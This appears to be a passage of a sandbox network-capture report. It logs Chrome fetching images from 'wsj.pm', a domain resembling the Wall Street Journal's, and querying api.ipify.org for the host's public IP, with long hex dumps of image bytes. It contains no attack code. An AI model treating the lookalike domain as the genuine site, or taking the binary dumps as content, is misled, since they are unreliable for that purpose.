                                                                                                                2024-04-25 14:58:19 UTC8000INData Raw: ac 5e bd 3a 57 99 91 7f 36 77 ee 5c d9 b9 73 a7 d3 7d f2 cd c0 d2 25 99 a3 47 8f 76 6a 27 ea 93 92 de c8 dd 35 40 b3 14 a2 46 3d 26 1a f0 0c 1e 3c 38 ea db 24 d6 fe 5d 77 dd 25 b7 de 7a 6b 62 f7 e7 c6 08 20 80 00 02 08 20 90 7e 01 02 ac f4 8f 31 3d 44 00 01 04 72 0a d4 d4 d4 e4 fc 3c a9 0f 5d 67 ed 84 5d 9f eb 72 bb 2e 5d ba c8 80 01 03 f2 de de ca 72 b8 24 03 2c 7d ab a4 06 92 2e 87 a5 10 d5 a5 de 62 ce e9 dc b9 b3 fc f8 c7 3f 96 b6 6d db 16 d3 8c e9 6b 7f fa d3 9f ca 6d b7 dd 66 ba 46 8a 43 00 01 04 10 40 00 01 7f 05 08 b0 fc 1d 3b 2a 47 00 01 04 8a 12 e8 dd bb b7 e8 5b f5 ac 1c 49 05 58 ef bc f3 8e 13 41 be d9 57 d9 06 ac 84 82 eb d6 ad 4b 6c 46 5b 90 71 2c a5 00 4b 9f 11 7d 3e ae ba ea aa ec e3 92 ca 5f bf ff fd ef cb 7f fe e7 7f a6 b2 6f 74 0a 01 04
                                                                                                                Data Ascii: ^:W6w\s}%Gvj'5@F=&<8$]w%zkb ~1=Dr<]g]r.]r$,}.b?mkmfFC@;*G[IXAWKlF[q,K}>_ot
                                                                                                                2024-04-25 14:58:19 UTC8000INData Raw: 6b 6b e5 ec b3 cf 96 39 73 e6 1c d0 d7 38 3e f8 c6 37 be 21 8b 17 2f 8e e3 56 dc 03 01 04 10 40 00 81 44 05 08 b0 12 e5 e7 e6 08 20 80 80 ff 02 ba 9c 6c cc 98 31 e6 3b e2 c3 f2 c1 2c a2 f5 65 99 04 58 d9 91 da f7 d7 37 df 7c 73 df 0f f8 29 a7 40 79 79 b9 1c 71 c4 11 39 bf f3 ed c3 ba ba 3a 39 e7 9c 73 24 c9 25 a4 5b b7 6e 95 2f 7d e9 4b a2 21 2a 07 02 08 20 80 00 02 69 16 20 c0 4a f3 e8 d2 37 04 10 40 20 26 01 eb 81 8b 32 f8 b0 81 7b 76 b8 ac 2f 23 24 c0 ca 8e d4 be bf fe e3 1f ff d8 f7 03 7e 6a 56 20 c9 65 84 ed da b5 6b b6 ae a0 5f 5c 79 e5 95 32 77 ee dc a0 97 85 7e be 3e 7b bf f9 cd 6f 42 6f 97 06 11 40 00 01 04 10 b0 24 40 80 65 69 34 a8 05 01 04 10 f0 54 c0 7a e0 a2 ac 3e 05 58 35 35 35 66 9f 04 5d de 38 70 e0 40 b3 f5 25 59 18 01 96 bb fe 21 87 1c
                                                                                                                Data Ascii: kk9s8>7!/V@D l1;,eX7|s)@yyq9:9s$%[n/}K!* i J7@ &2{v/#$~jV ek_\y2w~>{oBo@$@ei4Tz>X555f]8p@%Y!
                                                                                                                2024-04-25 14:58:19 UTC4812INData Raw: be f8 e2 4d 06 7e e8 a1 87 6e f2 73 b7 7f 88 59 89 33 67 ce 6c bc 9e 7c f2 c9 f4 d3 9f fe 34 2d 5a b4 28 2d 5d ba 34 3d f5 d4 53 95 95 17 b7 02 8e 1e 3d ba b1 f8 78 84 55 11 5c c5 cf b6 ea 05 06 0f 1e dc 78 02 65 df ba 61 ab 56 ad 6a dc 3a fa d0 43 0f a5 15 2b 56 34 5e 7f f9 cb 5f 5a be 70 3c 48 63 d4 a8 51 e9 80 03 0e 68 bc 22 d8 8e e0 2a 02 49 1b 01 02 04 08 10 e8 35 81 9d 5e fc ff ad d7 8a 52 0f 01 02 04 08 94 23 b0 7c f9 f2 f4 cc 33 cf 34 35 e0 f8 63 39 82 2f db 96 02 0f 3c f0 40 7a e1 85 17 b6 7c 63 b3 df c4 1f ac 31 cb c2 56 86 c0 13 4f 3c d1 58 57 69 e5 ca 95 29 5e 11 70 ad 5e bd 3a fd e7 3f ff 49 eb d6 ad 6b 7c 8d cf 4d ac 69 14 b7 00 6e fc 1a 36 6c 58 23 dc 88 db 01 23 c8 8b 70 c3 0c ab de f9 dc 44 df fe f9 cf 7f 36 fa f8 fc f3 cf a7 78 c5 ad a4
                                                                                                                Data Ascii: M~nsY3gl|4-Z(-]4=S=xU\xeaVj:C+V4^_Zp<HcQh"*I5^R#|345c9/<@z|c1VO<XWi)^p^:?Ik|Min6lX##pD6x


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                19192.168.2.1749739103.113.70.374436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:19 UTC575OUTGET /img/im-949345.jpeg HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                Sec-Fetch-Dest: image
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:19 UTC252INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:19 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:15:57 GMT
                                                                                                                ETag: "9697-61648fa88f540"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 38551
                                                                                                                Connection: close
                                                                                                                Content-Type: image/jpeg
                                                                                                                2024-04-25 14:58:19 UTC7940INData Raw: ff d8 ff db 00 43 00 06 04 05 06 05 04 06 06 05 06 07 07 06 08 0a 10 0a 0a 09 09 0a 14 0e 0f 0c 10 17 14 18 18 17 14 16 16 1a 1d 25 1f 1a 1b 23 1c 16 16 20 2c 20 23 26 27 29 2a 29 19 1f 2d 30 2d 28 30 25 28 29 28 ff db 00 43 01 07 07 07 0a 08 0a 13 0a 0a 13 28 1a 16 1a 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 ff c0 00 11 08 01 55 02 5f 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 03 00 02 04 05 06 01 07 08 ff c4 00 4f 10 00 02 01 03 02 02 06 06 08 03 05 05 07 04 01 05 01 02 03 00 04 11 05 21 12 31 06 13 41 51 61 71 14 22 32 81 91 a1 07 23 42 52 62 b1 c1 d1 15 33 72 24 43 82 92 e1 16 34 53 63 f0 44 73
                                                                                                                Data Ascii: C%# , #&')*)-0-(0%()(C(((((((((((((((((((((((((((((((((((((((((((((((((((U_"O!1AQaq"2#BRb3r$C4ScDs
                                                                                                                2024-04-25 14:58:19 UTC8000INData Raw: 7a a7 6e 74 25 63 8a 72 1c b1 ee da a5 96 4c 53 b5 77 bf 7c 52 b3 b4 9a e7 3e 8e 8d c2 39 b7 25 15 6f 6d a3 0c 06 b9 9b 39 ec 8c 7e a6 92 b1 3a 28 df 6f 2a 51 c5 24 ad 88 d1 9b fa 46 6b 51 15 95 a4 38 e1 85 4f 8b fa c7 e7 46 37 0a 83 09 8f 00 36 15 56 65 56 66 53 49 ba 6d d6 13 1b 77 92 07 ca 9c 74 09 1c e6 73 02 b7 78 c9 3f 2a ba 96 f0 f2 05 43 77 0d ea 2b b4 ae 4e 0c 8c d8 e4 a0 ef 46 e9 76 3f ad 90 d3 43 44 20 8b c9 0f 87 08 23 e7 bd 49 5b 28 62 c0 e3 91 b1 be 06 29 8d 0d c0 64 0b 0c cd 93 eb 1e ac ed 49 e2 9c 6c 20 b8 27 fe ed aa d6 45 ec 87 8d 87 ea 62 0b 92 18 79 b0 a1 98 e1 f1 f8 d5 75 e3 35 be 0c f1 cb 11 3b 02 f1 95 1f 12 2a 31 9d cb 30 52 57 84 ef 8a b5 3b e8 cd c2 8b 70 91 1e 45 8f 95 34 c6 a3 18 2d f0 15 0a 1b 92 a4 75 8c 00 c7 3a 77 5e e5 b2
                                                                                                                Data Ascii: znt%crLSw|R>9%om9~:(o*Q$FkQ8OF76VeVfSImwtsx?*Cw+NFv?CD #I[(b)dIl 'Ebyu5;*10RW;pE4-u:w^
                                                                                                                2024-04-25 14:58:19 UTC8000INData Raw: 44 8a a5 e9 3e 87 1e b3 67 84 22 3b c8 c1 31 49 ff 00 c4 f8 1a b9 a5 4a 51 52 54 ca 4e 9d a3 e7 be 94 68 0d 7f 14 a8 d0 b2 de 43 95 2a c3 04 e3 9a 9f d2 bc d3 81 2d e7 31 4b 1c 8a c3 91 57 c7 c8 d7 d5 5d 2e d0 bd 3e 23 77 66 a3 d3 63 1e b2 ff 00 c5 51 d9 e7 dd 5e 17 d3 3d 11 6e 03 5e 40 80 1c fa e0 6d 86 ef fd eb cd cb 8d e3 67 a1 8a 7f 62 32 4b 90 3d 49 df 1f 88 03 f9 1a 42 49 87 da 46 f0 ce 3f 3a 0c 07 ec 86 91 19 76 20 ef 52 09 97 b0 c6 c3 f1 0c 56 4c d5 0c 2f 27 36 84 91 e1 83 51 dd a3 c7 af 18 5f 35 c5 49 25 c0 c9 81 0f f4 b0 34 c7 91 46 38 91 d7 dc 6a 46 46 e3 8f 3e ae 07 95 3f ae 3f 7b 34 9d ed df da 58 c9 f1 14 36 8e 16 e4 08 fe 96 a0 63 5e 62 c4 ab 20 20 76 f7 d5 9e 8f 1a ba bf 0a 80 49 df 02 aa 1a 2f 58 aa c8 e3 c4 80 6a ff 00 a3 50 90 18 96 2d
                                                                                                                Data Ascii: D>g";1IJQRTNhC*-1KW].>#wfcQ^=n^@mgb2K=IBIF?:v RVL/'6Q_5I%4F8jFF>??{4X6c^b vI/XjP-
                                                                                                                2024-04-25 14:58:19 UTC8000INData Raw: 17 7a 7b 1e 5c 6c 9f 11 5d 07 7a ec f2 73 5f 04 eb 15 b5 32 21 bb 90 84 27 70 a0 ed e2 68 b2 dc 58 31 7e ae d2 45 dc 70 fa f9 c0 ed cf 79 aa ce 21 9e 74 e0 69 50 59 2a 79 61 6b 8e 28 a1 09 16 c0 21 25 bd e6 ac 23 b9 d3 d5 e4 fa 82 57 80 22 02 83 3e 24 ef ce a9 15 b3 21 df 95 3d 9c 05 3f 97 7d 0d 58 ec 9f 75 3d b4 f1 c6 2d a0 08 a1 40 2c 57 84 93 e5 4f b1 6b 78 e4 56 96 25 38 e7 c5 92 0f bb b2 a0 46 78 63 00 f3 02 88 0e 69 57 05 22 d2 79 6c 3a 96 58 e0 25 d8 e0 90 37 51 e0 48 e7 ee aa e2 80 b1 e1 07 87 3b 66 98 f3 24 4a 0c 8c 06 79 0e d3 e4 28 f6 f6 f2 5c ef 38 31 43 f7 01 f5 9b cf bb ca 95 51 54 02 35 69 9c a5 ba 86 61 ed 31 f6 57 f7 ab 1b 2d 35 21 62 e7 2f 31 e6 ed cf dd dd 53 ed 20 50 12 28 50 0e c5 55 15 70 b1 da e9 b1 09 ef 9d 78 cf b2 9c f2 7f 5a 89
                                                                                                                Data Ascii: z{\l]zs_2!'phX1~Epy!tiPY*yak(!%#W">$!=?}Xu=-@,WOkxV%8FxciW"yl:X%7QH;f$Jy(\81CQT5ia1W-5!b/1S P(PUpxZ
                                                                                                                2024-04-25 14:58:19 UTC6611INData Raw: 81 59 fc 94 e2 b5 82 da 04 3f 57 6c 8a 7b ce e7 e2 69 e5 df 87 19 38 e5 80 6a 1e 64 ba 2d 63 6c cc 2f 47 ae 46 ef d5 c6 3f e6 10 2a 4c 7a 0c 0a 3e ba e8 1c 73 11 c7 fa 9a ba 20 92 3d 43 bf 7f 65 70 86 c6 78 48 f2 15 0f 3c bc 15 f4 af 25 74 7a 5d 8c 5c a3 2f 8f f8 87 3f 95 19 56 da 32 42 08 90 8e c5 5c 54 a2 31 9c ab 66 a3 4d 77 04 64 06 53 9e c0 17 3f 95 2d e7 2f 25 69 08 f8 1a 5a 16 1b b8 3b 76 9a a0 e9 2f 48 f4 dd 08 44 b7 21 e4 92 50 48 48 f0 4e 07 69 26 ad ae 2f 3d 5c db db a9 6e c2 fb 0f ca aa 2f ad 17 51 8c 2e a1 65 6f 29 e4 31 17 21 e6 46 6a e1 8d b7 6c ce 79 12 55 13 cd 3a 75 d2 98 35 eb 54 b7 b6 eb 2d a1 43 c4 41 f5 b8 cf 61 3e 5b d7 9c bc 7b 90 06 7c 71 5f 40 3f 47 f4 b1 ec e9 36 a0 8f f9 7f e9 40 6d 0e c4 12 57 4c b3 cf fd d7 fa 57 52 6a 2a 91
                                                                                                                Data Ascii: Y?Wl{i8jd-cl/GF?*Lz>s =CepxH<%tz]\/?V2B\T1fMwdS?-/%iZ;v/HD!PHHNi&/=\n/Q.eo)1!FjlyU:u5T-CAa>[{|q_@?G6@mWLWRj*


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                20192.168.2.1749740103.113.70.374436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:19 UTC574OUTGET /img/im-949675.png HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                Sec-Fetch-Dest: image
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:20 UTC250INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:20 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:16:09 GMT
                                                                                                                ETag: "21c5-61648fb401040"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 8645
                                                                                                                Connection: close
                                                                                                                Content-Type: image/png
                                                                                                                2024-04-25 14:58:20 UTC7942INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 1f 00 00 00 c0 08 02 00 00 00 b2 2a f0 54 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 20 00 49 44 41 54 78 9c ed 5d 7d 6c 1c 45 96 f7 9f 04 f2 81 58 f6 8e 5d 40 41 da 45 27 6e 21 d1 c1 69 74 ab cb e1 40 df 87 08 ba 1b cd 29 82 3b 85 1d eb 50 20 44 db 52 f8 10 3a b5 94 64 ec 40 1a 27 67 76 92 30 a3 24 66 91 19 86 55 d8 f3 c6 1d 7b 12 3b 84 36 c6 5e 6f 9c 06 3b 5e 73 d8 73 8a d7 44 76 66 7d 1c 46 f9 98 93 15 29 ff cc c9 f3 92 97 97 ea 9e f6 cc 78 66 ba 7b e6 fd 54 b2 66 ca 35 d5 55 d5 ef d7 ef d5 ab aa d7 75 19 06 83 51 1e d4 95 a9 5e 06 83 c1 ec 62 30 ca 05 66 17 83 51 4e 76 05 08 24 49 92 65 59 d7 f5 42 2b 82 9f a7 52 a9 3c cb a7 52 29 f8 89 f9 5f 4a 16 50 15 ad 96 e6 43 0d
                                                                                                                Data Ascii: PNGIHDR*TpHYs~ IDATx]}lEX]@AE'n!it@);P DR:d@'gv0$fU{;6^o;^ssDvf}F)xf{Tf5UuQ^b0fQNv$IeYB+R<R)_JPC
                                                                                                                2024-04-25 14:58:20 UTC703INData Raw: b3 e4 ff 3a de 56 47 d2 d1 fe df e7 d3 f7 6a d5 5d db 7f d5 57 b3 ec 8a 77 0f 56 82 5d f5 f5 eb 1f 63 30 18 05 62 78 78 78 71 76 bd f0 c2 0b 96 e5 6a 01 b5 dc f7 4c 26 f3 d8 63 8f 65 6a 15 8f 95 a7 ef cc ae 9b 60 76 65 6a 15 8f 55 86 5d 5d 5d 5d 7f fc e3 1f 33 35 89 5a ee 7b 26 93 39 7c f8 70 a6 56 71 b8 3c 7d 17 d9 c5 60 30 4a 05 66 17 83 51 2e 30 bb 18 8c 72 81 d9 c5 60 94 9f 5d c9 64 32 18 0c 2e 84 74 95 24 c3 30 32 99 4c 3a 9d 96 65 d9 e7 f3 c9 b2 9c 4e a7 17 76 d0 a7 52 90 23 49 92 ae eb f8 43 45 51 7c 3e 5f c6 23 48 26 93 d0 5a 73 97 2d 3b 58 65 f0 f9 7c c9 64 d2 dc d3 48 24 12 08 04 e0 b8 be a6 69 99 2a 85 2f 47 f7 11 aa aa 96 4a 98 6f b2 4b 92 a4 58 2c 66 18 86 aa aa 81 40 00 2e 03 bc 92 65 39 12 89 64 32 99 60 30 18 89 44 92 c9 64 2c 16 83 16 a4
                                                                                                                Data Ascii: :VGj]WwV]c0bxxxqvjL&cej`vejU]]]]35Z{&9|pVq<}`0JfQ.0r`]d2.t$02L:eNvR#ICEQ|>_#H&Zs-;Xe|dH$i*/GJoKX,f@.e9d2`0Dd,


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                21192.168.2.1749741104.26.13.2054436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:19 UTC349OUTGET /?format=json HTTP/1.1
                                                                                                                Host: api.ipify.org
                                                                                                                Connection: keep-alive
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: none
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:20 UTC217INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:20 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                Vary: Origin
                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 879f30cbcd9eb0a5-ATL
                                                                                                                2024-04-25 14:58:20 UTC23INData Raw: 7b 22 69 70 22 3a 22 31 38 35 2e 31 35 32 2e 36 36 2e 32 33 30 22 7d
                                                                                                                Data Ascii: {"ip":"185.152.66.230"}


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                22192.168.2.1749742103.113.70.374436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:20 UTC575OUTGET /img/im-948848.jpeg HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                Sec-Fetch-Dest: image
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:20 UTC251INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:20 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:16:24 GMT
                                                                                                                ETag: "2572-61648fc24f200"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 9586
                                                                                                                Connection: close
                                                                                                                Content-Type: image/jpeg
                                                                                                                2024-04-25 14:58:20 UTC7941INData Raw: ff d8 ff db 00 43 00 06 04 05 06 05 04 06 06 05 06 07 07 06 08 0a 10 0a 0a 09 09 0a 14 0e 0f 0c 10 17 14 18 18 17 14 16 16 1a 1d 25 1f 1a 1b 23 1c 16 16 20 2c 20 23 26 27 29 2a 29 19 1f 2d 30 2d 28 30 25 28 29 28 ff db 00 43 01 07 07 07 0a 08 0a 13 0a 0a 13 28 1a 16 1a 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 ff c0 00 11 08 00 bf 01 1f 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 05 02 03 04 06 07 01 00 08 ff c4 00 3d 10 00 02 01 03 03 02 04 02 08 06 02 01 03 05 00 00 01 02 03 00 04 11 05 12 21 06 31 13 41 51 61 22 71 07 14 23 32 42 81 91 a1 33 52 b1 c1 d1 f0 72 e1 15 34 82 f1 08 16 24 62 73 ff c4 00
                                                                                                                Data Ascii: C%# , #&')*)-0-(0%()(C((((((((((((((((((((((((((((((((((((((((((((((((((("=!1AQa"q#2B3Rr4$bs
                                                                                                                2024-04-25 14:58:20 UTC1645INData Raw: dc 47 1a 5e 09 7d 57 b8 ad 1c 4c b6 2c 5a 6f 56 26 ab 68 6c 3a 96 54 75 c6 03 b0 01 87 cc 1e f5 03 52 fa 33 b3 d5 90 dc 68 3a 84 6c 00 c8 50 77 01 f9 55 ce db a4 ad 7a 83 43 7f 0e 34 17 21 73 90 33 fb 1a cb 1e d3 53 d2 75 59 ac 56 57 86 64 3f 84 9e 7d 31 5c d9 15 3a 3a b1 3d 95 81 f5 3d 16 e7 a6 9e 68 b5 1b 68 e5 f1 06 d4 90 1f ba 68 75 a4 2d 7b 38 86 57 fb 88 48 3e 95 74 eb b9 5c 74 ed 9c 17 05 a6 bd c0 de 5f bf ce a8 56 0c f6 eb 72 c5 48 60 98 fd 6a 39 68 d7 a7 42 22 3b 27 2a 4e 41 e2 ae 9f 46 f7 c2 1b d9 f4 e9 db 10 cb c6 0f a1 aa 3c 20 98 b3 8f 7c d1 2b 0b 83 6b a9 d9 dc a9 c0 24 02 69 ae 19 2f 94 4a ea db 71 a5 eb 97 10 00 7c 32 77 03 43 59 16 68 f7 70 07 b5 59 7e 91 d4 4d 35 b5 d8 ed 22 8c 9f ca aa da 70 66 57 01 43 63 d6 86 a8 13 b2 35 ec 29 04 e5
                                                                                                                Data Ascii: G^}WL,ZoV&hl:TuR3h:lPwUzC4!s3SuYVWd?}1\::==hhhu-{8WH>t\t_VrH`j9hB";'*NAF< |+k$i/Jq|2wCYhpY~M5"pfWCc5)


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                23192.168.2.1749743103.113.70.374436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:20 UTC598OUTGET /img/CH-AA158_Bernst_NS_20100111195708.gif HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                Sec-Fetch-Dest: image
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:20 UTC250INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:20 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:16:37 GMT
                                                                                                                ETag: "1c6a-61648fceb4f40"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 7274
                                                                                                                Connection: close
                                                                                                                Content-Type: image/gif
                                                                                                                2024-04-25 14:58:20 UTC7274INData Raw: 47 49 46 38 39 61 4c 00 4c 00 f7 00 00 fe fe fe fd fd fd fc fc fc f6 f6 f6 f9 f9 f9 fa fa fa fb fb fb ee ee ee f7 f7 f7 6c 6c 6c f2 f2 f2 73 73 73 56 56 56 f8 f8 f8 f1 f1 f1 71 71 71 58 58 58 5c 5c 5c 59 59 59 f5 f5 f5 ef ef ef f4 f4 f4 f0 f0 f0 e6 e6 e6 eb eb eb f3 f3 f3 ec ec ec 76 76 76 66 66 66 65 65 65 74 74 74 ed ed ed 88 88 88 79 79 79 49 49 49 ea ea ea 80 80 80 8b 8b 8b 9a 9a 9a 92 92 92 6b 6b 6b 63 63 63 54 54 54 89 89 89 81 81 81 68 68 68 51 51 51 55 55 55 dc dc dc 70 70 70 e7 e7 e7 67 67 67 6f 6f 6f 5d 5d 5d 61 61 61 46 46 46 53 53 53 e1 e1 e1 72 72 72 87 87 87 57 57 57 48 48 48 4a 4a 4a 4f 4f 4f 77 77 77 78 78 78 7d 7d 7d 64 64 64 7f 7f 7f e5 e5 e5 de de de 8a 8a 8a 82 82 82 e9 e9 e9 7a 7a 7a 5f 5f 5f 40 40 40 df df df d2 d2 d2 83 83 83 50 50
                                                                                                                Data Ascii: GIF89aLLlllsssVVVqqqXXX\\\YYYvvvfffeeetttyyyIIIkkkcccTTThhhQQQUUUpppgggooo]]]aaaFFFSSSrrrWWWHHHJJJOOOwwwxxx}}}dddzzz___@@@PP


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                24192.168.2.1749744103.113.70.374436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:20 UTC568OUTGET /img/AM.jpeg HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                Sec-Fetch-Dest: image
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:20 UTC252INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:20 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:16:52 GMT
                                                                                                                ETag: "4b4e-61648fdd03100"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 19278
                                                                                                                Connection: close
                                                                                                                Content-Type: image/jpeg
